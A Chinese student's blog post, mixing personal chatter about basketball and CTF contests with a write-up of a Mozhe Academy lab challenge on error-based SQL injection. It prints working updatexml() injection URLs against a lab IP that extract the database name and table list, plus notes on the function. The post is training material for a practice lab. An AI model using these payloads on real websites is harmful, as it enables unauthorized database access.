墨者学院SQL报错盲注
好久不见,甚是想念啊,等打完篮球比赛,估计在大学剩余的能一起打篮球的比赛对于我来说应该完结了,好好珍惜最后的大二时光。打完比赛后潜心学习了。20号去参加校赛好激动啊,就是自己刷的题还是太少,trick了解太少,去之前不能坑队友。我要再去钻研钻研了。DDCTF整的我,我就是个菜鸡,还需要很长时间的学习磨砺。
嗯哼,这几天篮球比赛,天天训练,学习都耽搁了,DDCTF做了一会心态就爆炸了,蓝瘦,明天再打一场,希望能赢呢,打完就疯狂继续学习了。今天抽空又做了一些基本的SQL注入题目,墨者学院的一道报错注入的题目,很基础。并且没过滤啥,所以直接肝就完事了。我一开始用了SQLMAP就直接跑了,然后还是锻炼一下手注把。
首先,还是那个页面(最近又用起了火狐,毕竟比Chrome 占用资源少,卡顿少)
然后加了一个\’
很明显的报错注入把。那我就用我之前学到的一个updatexml函数来报错:
http://219.153.49.228:49249/new_list.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),3)%20%23
http://219.153.49.228:49249/new_list.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x73746f726d67726f7570),0x7e),3)%20%23
这是最基础的部分,就不讲解了。就做些笔记把。最后记得用limit限制行数。
UPDATEXML (XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,为XML文档对象的名称。
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。
第三个参数:new_value,String格式,替换查找到的符合条件的数据
——————— 摘自 https://blog.csdn.net/xingyyn78/article/details/79737070
顺便记一下substr函数是从1开始,而不是0
再上一篇用另外的方法进行的报错注入(笔记) https://blog.csdn.net/qq_41409656/article/details/79165873